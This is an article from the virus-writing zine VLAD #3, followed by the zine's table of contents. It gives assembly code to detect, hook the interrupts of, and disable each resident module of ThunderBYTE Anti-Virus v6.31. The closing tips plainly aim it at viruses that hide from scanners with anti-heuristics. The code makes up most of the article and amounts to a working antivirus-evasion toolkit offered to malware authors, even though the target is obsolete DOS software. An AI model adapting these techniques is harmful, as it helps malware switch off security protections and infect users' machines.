Virus Labs & Distribution
VLAD #3 - TBAV Monitor

			T B A V   M O N I T O R
			       Written by

  Thanks for the idea to Conzouler and The Unforgiven of Immortal Riot
	      Read Immortal Riot's magazine Insane Reality


  This document is an example of how to detect, intercept and enable/disable
the memory resident programs of ThunderBYTE Anti-Virus: TbDriver, TbScanX,
TbCheck, TbMem, TbFile, TbDisk and TbLog.

Thunderbyte B.V. about TbDriver

     Enable memory resident TBAV utilities: TbDriver

     TbDriver does not provide much protection against viruses by itself, but
     must be loaded in advance to enable the memory resident ThunderBYTE
     Anti-Virus utilities, such as TbScanX, TbCheck, TbMem, TbFile and TbDisk
     to perform properly. It also provides basic protection against ANSI
     bombs and 'stealth' viruses.

Interrupts hooked by TbDriver

These interrupts are hooked by TbDriver:

  INT 20h (DOS Program Terminate)
  INT 21h (DOS Function call)
  INT 27h (DOS Terminate and Stay Resident)
  INT 29h (DOS Fast Console Output)
  INT 2Fh (Software Multiplex)

How to detect TbDriver

The below code shows an example of how to detect TbDriver:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[29h*04h]     ; Get address of interrupt 29h
	     cmp     [si],2e53h          ; TbDriver resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Intercept TbDriver here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

This example must be used before interception of TbDriver.

How to intercept TbDriver

  The below code shows an example of how to intercept all interupts hooked
by TbDriver:

;------------------------------------------------------------=< cut here >=-
	     lea     di,int29adr         ; DI = offset of int29adr
	     add     si,43h              ; SI = offset of original INT 29h
	     movsw                       ; Move address of original INT 29h
	     movsw                       ;  "      "    "     "      "   "

	     lea     di,int2fadr         ; DI = offset of int2fadr
	     add     si,17h              ; SI = offset of original INT 2fh
	     movsw                       ; Move address of original INT 2fh
	     movsw                       ;  "      "    "     "      "   "

	     lea     di,int21adr         ; DI = offset of int21adr
	     add     si,0c4h             ; SI = offset of original INT 21h
	     movsw                       ; Move address of original INT 21h
	     movsw                       ;  "      "    "     "      "   "

	     mov     ds,ax               ; DS = segment of interrupt vectors

	     mov     word ptr ds:[20h*04h],offset int20h
	     mov     ds:[20h*04h+02h],es ; Intercept interrupt 20h

	     mov     word ptr ds:[21h*04h],offset int21h
	     mov     ds:[21h*04h+02h],es ; Intercept interrupt 21h

	     mov     word ptr ds:[27h*04h],offset int27h
	     mov     ds:[27h*04h+02h],es ; Intercept interrupt 27h

	     mov     word ptr ds:[29h*04h],offset int29h
	     mov     ds:[29h*04h+02h],es ; Intercept interrupt 29h

	     mov     word ptr ds:[2fh*04h],offset int2fh
	     mov     ds:[2fh*04h+02h],es ; Intercept interrupt 2fh
;------------------------------------------------------------=< cut here >=-

Necessary procedures and variables to intercept TbDriver

  These procedures and variable are necessary to emulate the original

;------------------------------------------------------------=< cut here >=-
int20h       proc    near                ; DOS Program Terminate
	     xor     ax,ax               ; Terminate program

int21h       proc    near                ; DOS Function call
	     db      0eah                ; Object code of jump far
int21adr     dd      ?                   ; Address of interrupt 21h

int27h       proc    near                ; DOS Terminate and Stay Resident
	     mov     ah,31h              ; Terminate and stay resident
	     mov     cl,04h              ; Multiply by paragraphs
	     shr     dx,cl               ; Calculate paragraphs
	     inc     dx                  ; Increase DX
	     jmp     short int21h

int29h       proc    near                ; DOS Fast Console Output
	     db      0eah                ; Object code of jump far
int29adr     dd      ?                   ; Address of interrupt 29h

int2fh       proc    near                ; Software Multiplex
	     db      0eah                ; Object code of jump far
int2fadr     dd      ?                   ; Address of interrupt 2fh
;------------------------------------------------------------=< cut here >=-

Thunderbyte B.V. about TbScanX

     Automatic scanning: TbScanX

     TbScanX is the memory resident version of TbScan. This signature scanner
     remains resident in memory and automatically scans those files which are
     being executed, copied, de-archived, downloaded, etc. TbScanX does not
     require much memory. It can swap itself into expanded, XMS, or high
     memory, using only 1Kb of conventional memory.

Interrupts hooked by TbScanX

These interrupts are hooked by TbScanX:

  INT 13h (BIOS Fixed disk/FDD Services)
  INT 2Fh (Software Multiplex)

  It may look like the below interrupt is hooked, because it pointers to the
code of TbScanX, but it is NOT hooked:

  INT E1h (BASIC Reserved)

How to detect TbScanX

The below code shows an example of how to detect TbScanX:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[13h*04h]     ; Get address of interrupt 13h
	     cmp     [si],2e9ch          ; TbScanX resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Enable/disable or intercept TbScanX here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

  You can't detect or intercept TbScanX probably if TbDisk has hooked the
interrupt before or after, so please detect TbDisk before and after.

This example must used before enable/disable or interception of TbScanX.

How to intercept TbScanX

  The below code shows an example of how to intercept interrupt 13h, which is
hooked by TbScanX:

;------------------------------------------------------------=< cut here >=-
	     lea     di,int13adr         ; DI = offset of int13adr
	     add     si,66h              ; SI = offset of original INT 13h
	     movsw                       ; Move address of original INT 13h
	     movsw                       ;  "      "    "     "      "   "

	     mov     ds,ax               ; DS = segment of interrupt vectors

	     mov     word ptr ds:[13h*04h],offset int13h
	     mov     ds:[13h*04h+02h],es ; Intercept interrupt 13h
;------------------------------------------------------------=< cut here >=-

  It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbScanX.

Necessary procedures and variables to intercept TbScanX

  These procedures and variable are necessary to emulate the original

;------------------------------------------------------------=< cut here >=-
int13h       proc    near                ; BIOS Fixed disk/FDD Services
	     db      0eah                ; Object code of jump far
int13adr     dd      ?                   ; Address of interrupt 13h
;------------------------------------------------------------=< cut here >=-

How to enable TbScanX

The below code shows an example of how to enable TbScanX:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-12ch],00h
;------------------------------------------------------------=< cut here >=-

How to disable TbScanX

The below code shows an example of how to disable TbScanX:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-12ch],19h
;------------------------------------------------------------=< cut here >=-

Thunderbyte B.V. about TbCheck

     Check while loading: TbCheck

     TbCheck is a memory resident integrity checker. This program remains
     resident in memory and checks automatically every file just before it is
     being executed. TbCheck uses a fast integrity checking method, consuming
     only 400 bytes of memory. It can be configured to reject files with
     incorrect checksums, and/or to reject files that do not have a corres-
     ponding Anti-Vir.Dat record.

Interrupts hooked by TbCheck

TbCheck does not hook interrupts.
And therefore you do not need to intercept it.

How to detect TbCheck

The below code shows an example of how to detect TbCheck:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[21h*04h]     ; Get address of interrupt 21h
	     lds     si,ds:[si+75h]      ; Get address of TbCheck
	     cmp     [si],3d9ch          ; TbCheck resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Enable/disable TbCheck here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

  You can't detect TbCheck probably if TbScanX, TbMem, TbFile, TbDisk or
TbLog has hooked the interrupt before, so please detect them before.

This example must used before enable/disable TbCheck.

How to enable TbCheck

The below code shows an example of how to enable TbCheck:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-69h],00h
;------------------------------------------------------------=< cut here >=-

How to disable TbCheck

The below code shows an example of how to disable TbCheck:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-69h],01h
;------------------------------------------------------------=< cut here >=-

Thunderbyte B.V. about TbMem

     Controlling memory: TbMem

     TbMem detects attempts from programs to remain resident in memory, and
     ensures that no program can remain resident in memory without permis-
     sion. Since most viruses remain resident in memory, this is a powerful
     weapon against all such viruses, known or unknown. Permission informa-
     tion is maintained in the Anti-Vir.Dat files. TbMem also protects your
     CMOS memory against unwanted modifications.

Interrupts hooked by TbMem

These interrupts are hooked by TbMem:

  INT 09h (IRQ 1  Keyboard)
  INT 2Fh (Software Multiplex)

How to detect TbMem

The below code shows an example of how to detect TbMem:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[09h*04h]     ; Get address of interrupt 09h
	     cmp     [si],2e50h          ; TbMem resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Enable/disable or intercept TbMem here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

This example must used before enable/disable or interception of TbMem.

How to intercept TbMem

  The below code shows an example of how to intercept interrupt 09h, which is
hooked by TbMem:

;------------------------------------------------------------=< cut here >=-
	     lea     di,int09adr         ; DI = offset of int09adr
	     add     si,3ch              ; SI = offset of original INT 09h
	     movsw                       ; Move address of original INT 09h
	     movsw                       ;  "      "    "     "      "   "

	     mov     ds,ax               ; DS = segment of interrupt vectors

	     mov     word ptr ds:[09h*04h],offset int09h
	     mov     ds:[09h*04h+02h],es ; Intercept interrupt 09h
;------------------------------------------------------------=< cut here >=-

  It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbMem.

Necessary procedures and variables to intercept TbMem

  These procedures and variable are necessary to emulate the original

;------------------------------------------------------------=< cut here >=-
int09h       proc    near                ; IRQ 1  Keyboard
	     db      0eah                ; Object code of jump far
int09adr     dd      ?                   ; Address of interrupt 09h
;------------------------------------------------------------=< cut here >=-

How to enable TbMem

The below code shows an example of how to enable TbMem:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-253h],28h
;------------------------------------------------------------=< cut here >=-

How to disable TbMem

The below code shows an example of how to disable TbMem:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-253h],29h
;------------------------------------------------------------=< cut here >=-

Thunderbyte B.V. about TbFile

     Preventing infection: TbFile

     TbFile detects attempts from programs to infect other programs. It also
     guards read-only attributes, detects illegal time-stamps, etc. It will
     make sure that no virus succeeds in infecting programs.

Interrupts hooked by TbFile

TbFile does not hook interrupts.
And therefore you do not need to intercept it.

How to detect TbFile

The below code shows an example of how to detect TbFile:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[21h*04h]     ; Get address of interrupt 21h
	     lds     si,ds:[si+75h]      ; Get address of TbFile
	     cmp     [si],2e9ch          ; TbFile resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Enable/disable TbFile here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

  You can't detect TbFile probably if TbScanX, TbCheck, TbMem, TbDisk or
TbLog has hooked the interrupt before, so please detect them before.

This example must used before enable/disable TbFile.

How to enable TbFile

The below code shows an example of how to enable TbFile:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-0c5h],00h
;------------------------------------------------------------=< cut here >=-

How to disable TbFile

The below code shows an example of how to disable TbFile:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-0c5h],01h
;------------------------------------------------------------=< cut here >=-

Thunderbyte B.V. about TbDisk

     Protecting the disk: TbDisk

     TbDisk is a disk guard program which detects attempts from programs to
     write directly to disk (without using DOS), attempts to format, etc.,
     and makes sure that no malicious program will succeed in destroying your
     data. This utility also traps tunneling and direct calls into the BIOS
     code. Permission information about the rare programs that write directly
     and/or format the disk is maintained in the Anti-Vir.Dat files.

Interrupts hooked by TbDisk

These interrupts are hooked by TbDisk:

  INT 13h (BIOS Fixed disk/FDD Services)
  INT 15h (BIOS System Services)
  INT 26h (DOS Absolute Disk Write)
  INT 2Fh (Software Multiplex)
  INT 40h (BIOS Diskette Service)

How to detect TbDisk

The below code shows an example of how to detect TbDisk:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[26h*04h]     ; Get address of interrupt 26h
	     cmp     [si],2e9ch          ; TbDisk resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Enable/disable or intercept TbDisk here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

  You can't detect or intercept TbDisk probably if TbScanX has hooked the
interrupt before or after, so please detect TbScanX before and after.

This example must used before enable/disable or interception of TbDisk.

How to intercept TbDisk

  The below code shows an example of how to intercept interrupt 13h, 15h, 26h
and 40h, which is hooked by TbDisk:

;------------------------------------------------------------=< cut here >=-
	     lea     di,int26adr         ; DI = offset of int26adr
	     add     si,0fh              ; SI = offset of original INT 26h
	     movsw                       ; Move address of original INT 26h
	     movsw                       ;  "      "    "     "      "   "

	     lea     di,int40adr         ; DI = offset of int40adr
	     add     si,18h              ; SI = offset of original INT 40h
	     movsw                       ; Move address of original INT 40h
	     movsw                       ;  "      "    "     "      "   "

	     lea     di,int13adr         ; DI = offset of int13adr
	     add     si,2bh              ; SI = offset of original INT 13h
	     movsw                       ; Move address of original INT 13h
	     movsw                       ;  "      "    "     "      "   "

	     lea     di,int15adr         ; DI = offset of int15adr
	     add     si,18h              ; SI = offset of original INT 15h
	     movsw                       ; Move address of original INT 15h
	     movsw                       ;  "      "    "     "      "   "

	     mov     ds,ax               ; DS = segment of interrupt vectors

	     mov     word ptr ds:[13h*04h],offset int13h
	     mov     ds:[13h*04h+02h],es ; Intercept interrupt 13h

	     mov     word ptr ds:[15h*04h],offset int15h
	     mov     ds:[15h*04h+02h],es ; Intercept interrupt 15h

	     mov     word ptr ds:[26h*04h],offset int26h
	     mov     ds:[26h*04h+02h],es ; Intercept interrupt 26h

	     mov     word ptr ds:[40h*04h],offset int40h
	     mov     ds:[40h*04h+02h],es ; Intercept interrupt 40h
;------------------------------------------------------------=< cut here >=-

  It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbDisk.

Necessary procedures and variables to intercept TbDisk

  These procedures and variable are necessary to emulate the original

;------------------------------------------------------------=< cut here >=-
int13h       proc    near                ; BIOS Fixed disk/FDD Services
	     db      0eah                ; Object code of jump far
int13adr     dd      ?                   ; Address of interrupt 13h

int15h       proc    near                ; BIOS System Services
	     db      0eah                ; Object code of jump far
int15adr     dd      ?                   ; Address of interrupt 15h

int26h       proc    near                ; DOS Absolute Disk Write
	     db      0eah                ; Object code of jump far
int26adr     dd      ?                   ; Address of interrupt 26h

int40h       proc    near                ; BIOS Diskette Service
	     db      0eah                ; Object code of jump far
int40adr     dd      ?                   ; Address of interrupt 40h
;------------------------------------------------------------=< cut here >=-

How to enable TbDisk

The below code shows an example of how to enable TbDisk:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-0bah],00h
;------------------------------------------------------------=< cut here >=-

How to disable TbDisk

The below code shows an example of how to disable TbDisk:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-0bah],01h
;------------------------------------------------------------=< cut here >=-

Thunderbyte B.V. about TbLog

     The purpose of TbLog

     TbLog is a TBAV log file utility. It writes a record into a log file
     whenever one of the resident TBAV utilities pops up with an alert
     message. Also when TbScan detects a virus a record will be written.

Interrupts hooked by TbLog

This interrupt is hooked by TbLog:

  INT 2Fh (Software Multiplex)

  It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbLog.

How to detect TbLog

The below code shows an example of how to detect TbLog:

;------------------------------------------------------------=< cut here >=-
	     push    ds                  ; Save DS at stack
	     xor     ax,ax               ; Clear AX
	     mov     ds,ax               ; DS = segment of interrupt vectors
	     lds     si,ds:[2fh*04h]     ; Get address of interrupt 2fh
	     cmp     [si],0fd3dh         ; TbLog resident?
	     jne     detectexit          ; Not resident? Jump to detectexit

; Enable/disable TbLog here...

	     pop     ds                  ; Load DS from stack
;------------------------------------------------------------=< cut here >=-

  You can't detect TbLog probably if TbScanX, TbMem or TbDisk has hooked the
interrupt before, so please detect them before.

This example must used before enable/disable TbLog.

How to enable TbLog

The below code shows an example of how to enable TbLog:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-0a2h],00h
;------------------------------------------------------------=< cut here >=-

How to disable TbLog

The below code shows an example of how to disable TbLog:

;------------------------------------------------------------=< cut here >=-
	     mov     byte ptr ds:[si-0a2h],01h
;------------------------------------------------------------=< cut here >=-

Final tips and tricks

- These examples were tested with ThunderBYTE Anti-Virus v 6.31.
- Only intercept those interrupts the virus uses.
- Use a lot anti-heuristic's, so other programs can't find the virus either.
- Remember to optimize your code.



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ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


The Press
ARTICLE.2_2       Fooling TBScan
ARTICLE.2_3       Backdoors
ARTICLE.2_4       Tracing Int21
ARTICLE.2_5       Replication
ARTICLE.2_6       VSUM denial
ARTICLE.2_7       Proview


TBTSR Checking
ARTICLE.3_2       TBScan Flags
ARTICLE.3_3       HD Port Reading
ARTICLE.3_4       HD Port Writing
ARTICLE.3_5       TBAV Monitor
ARTICLE.3_6       Micro128 Disasm
ARTICLE.3_7       Aust403 Disasm


Virus Descriptions
ARTICLE.4_2       Hemlock
ARTICLE.4_3       Antipode
ARTICLE.4_4       Insert
ARTICLE.4_6       Quantum Magick
ARTICLE.4_7       Mon Ami La Pendule


ARTICLE.5_2       Small Virus
ARTICLE.5_3       Catch-22
ARTICLE.5_4       ART Engine
ARTICLE.5_5       Megastealth
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

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